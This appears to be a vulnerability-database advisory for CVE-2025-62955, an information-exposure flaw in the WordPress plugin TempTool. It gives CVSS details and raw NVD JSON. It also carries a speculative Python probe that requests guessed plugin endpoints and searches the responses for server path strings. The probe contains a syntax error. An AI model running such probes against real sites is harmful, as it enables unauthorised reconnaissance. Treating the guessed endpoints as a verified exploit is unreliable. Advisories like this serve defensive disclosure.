Security Vulnerability Report
中文
CVE-2025-62955 CVSS 4.3 MEDIUM

CVE-2025-62955

Published: 2025-12-21 21:15:49
Last Modified: 2026-04-23 15:34:52

Description

Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in HappyDevs TempTool [Show Current Template Info] current-template-name allows Retrieve Embedded Sensitive Data.This issue affects TempTool [Show Current Template Info]: from n/a through <= 1.3.1.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

HappyDevs TempTool (current-template-name) <= 1.3.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-62955 PoC - HappyDevs TempTool Sensitive Information Exposure # Target: WordPress site with HappyDevs TempTool plugin <= 1.3.1 target_url = "http://target-wordpress-site.com" # PoC endpoints that may expose sensitive information endpoints = [ "/wp-admin/admin-ajax.php", "/wp-admin/admin.php?page=current-template-name", "/wp-content/plugins/current-template-name/includes/ajax-handler.php" ] # Test for sensitive information disclosure for endpoint in endpoints: url = f"{target_url}{endpoint}" # Attempt with low-privilege user session params = { "action": "current_template_name_get_info", } try: response = requests.get(url, params=params, timeout=10) # Check for sensitive information in response sensitive_patterns = [ "ABSPATH", "WP_CONTENT_DIR", "document_root", "SERVER_ADMIN", "/var/www/", "C:\\inetpub\" ] for pattern in sensitive_patterns: if pattern in response.text: print(f"[+] VULNERABLE: {url}") print(f"[+] Found sensitive pattern: {pattern}") print(f"[+] Response snippet: {response.text[:500]}") break except requests.exceptions.RequestException as e: print(f"[-] Error accessing {url}: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62955", "sourceIdentifier": "[email protected]", "published": "2025-12-21T21:15:49.030", "lastModified": "2026-04-23T15:34:52.180", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in HappyDevs TempTool [Show Current Template Info] current-template-name allows Retrieve Embedded Sensitive Data.This issue affects TempTool [Show Current Template Info]: from n/a through <= 1.3.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/current-template-name/vulnerability/wordpress-temptool-show-current-template-info-plugin-1-3-1-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}